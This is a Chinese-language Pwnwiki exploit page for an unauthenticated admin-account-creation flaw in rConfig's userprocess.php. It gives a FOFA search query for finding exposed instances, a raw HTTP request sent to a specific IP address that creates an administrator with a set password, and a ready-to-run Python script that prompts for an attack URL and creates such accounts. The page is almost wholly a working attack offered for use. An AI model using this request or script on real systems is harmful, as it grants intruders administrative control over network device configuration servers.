Pwnwiki: Created page with "==FOFA==

 app="rConfig"

==漏洞利用== 發送如下請求包創建管理員用戶 pqtest，密碼為 PQtest@123

 POST /lib/crud/userprocess.php HTTP/1.1 H..."

2021-05-07T08:20:04Z

Created page with "==FOFA== <pre> app="rConfig" </pre> ==漏洞利用== 發送如下請求包創建管理員用戶 pqtest，密碼為 PQtest@123 <pre> POST /lib/crud/userprocess.php HTTP/1.1 H..."

New page

==FOFA==
<pre>
app="rConfig"
</pre>

==漏洞利用==
發送如下請求包創建管理員用戶 pqtest，密碼為 PQtest@123

<pre>
POST /lib/crud/userprocess.php HTTP/1.1
Host: 194.149.41.11
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=b1467349fcce4aa0ae8d44439f4e06bc
Upgrade-Insecure-Requests: 1
Referer: http://194.149.41.11/useradmin.php
Origin: http://194.149.41.11/
Cookie: PHPSESSID=pq
Content-Length: 697

--b1467349fcce4aa0ae8d44439f4e06bc
Content-Disposition: form-data; name="username"

pqtest
--b1467349fcce4aa0ae8d44439f4e06bc
Content-Disposition: form-data; name="password"

PQtest@123
--b1467349fcce4aa0ae8d44439f4e06bc
Content-Disposition: form-data; name="passconf"

PQtest@123
--b1467349fcce4aa0ae8d44439f4e06bc
Content-Disposition: form-data; name="email"

PQtest@test.com
--b1467349fcce4aa0ae8d44439f4e06bc
Content-Disposition: form-data; name="ulevelid"

9
--b1467349fcce4aa0ae8d44439f4e06bc
Content-Disposition: form-data; name="add"

add
--b1467349fcce4aa0ae8d44439f4e06bc
Content-Disposition: form-data; name="editid"

--b1467349fcce4aa0ae8d44439f4e06bc--
</pre>

==POC==
<pre>
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech

import base64
import requests
import random
import re
import json
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_toolbelt.multipart.encoder import MultipartEncoder

def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: rConfig userprocess.php 任意用户创建漏洞 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')

def POC_1(target_url):
vuln_url = target_url + "/lib/crud/userprocess.php"
referer = target_url + "useradmin.php"
ran_number = random.randint(1, 999)
origin = target_url
multipart_data = MultipartEncoder(
fields={
'username': 'pqtest{}'.format(ran_number),
'password': 'PQtest@{}'.format(ran_number),
'passconf': 'PQtest@{}'.format(ran_number),
'email': 'PQtest{}@test.com'.format(ran_number),
'ulevelid': '9',
'add': 'add',
'editid': ''
}
)
headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer,
"Origin": origin}
cookies = {'PHPSESSID': 'pqtest{}'.format(ran_number)}
print("\033[36m[o] 正在创建账户..... \033[0m".format(ran_number, ran_number))
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(vuln_url, data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False)
if "error" not in response.text:
print("\033[36m[o] 成功创建账户 pqtest{}/PQtest@{} \033[0m".format(ran_number, ran_number))
else:
print("\033[31m[x] 创建失败:{} \033[0m")
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)

#
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
</pre>

==參考==
http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/rConfig/rConfig%20userprocess.php%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%88%9B%E5%BB%BA%E6%BC%8F%E6%B4%9E.html

RConfig userprocess.php 任意用戶創建漏洞 - Revision history

Pwnwiki: Created page with "==FOFA==
app="rConfig"
==漏洞利用== 發送如下請求包創建管理員用戶 pqtest，密碼為 PQtest@123
POST /lib/crud/userprocess.php HTTP/1.1 H..."